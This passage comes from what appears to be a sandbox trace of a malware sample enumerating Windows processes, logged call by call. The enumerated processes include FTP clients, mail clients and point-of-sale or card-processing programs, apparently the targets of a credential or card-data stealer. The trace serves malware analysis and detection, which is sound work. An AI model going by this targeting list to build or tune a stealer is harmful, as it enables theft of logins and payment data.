lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0188.067] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0188.071] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0188.075] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0188.077] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0188.079] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0188.081] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0188.083] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0188.086] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0188.088] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0188.093] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0188.097] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0188.100] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0188.103] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0188.107] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0188.110] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0188.113] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0188.115] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0188.118] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0188.120] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0188.122] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0188.124] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0188.126] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0188.131] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0188.133] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0188.135] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0188.138] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0188.140] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0188.142] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0188.145] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0188.147] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0188.149] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0188.153] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0188.156] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0188.159] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0188.162] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0188.164] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0188.166] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0188.176] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0188.179] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0188.182] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0188.184] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0188.186] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0188.189] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0188.191] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0188.194] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0188.198] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0188.200] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0188.203] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0188.205] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0188.207] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0188.210] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0188.212] CloseHandle (hObject=0x18d8) returned 1 [0188.212] Sleep (dwMilliseconds=0x64) [0188.334] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bcc [0188.365] Process32First (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.367] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0188.369] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0188.372] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.374] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0188.376] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.379] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0188.383] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0188.385] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0188.430] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.433] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.435] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0188.438] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.440] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.441] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.443] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.446] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.447] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.449] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.451] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0188.453] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0188.454] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.456] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0188.458] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.460] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0188.461] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0188.463] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0188.528] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0188.531] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0188.533] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0188.535] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.537] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, 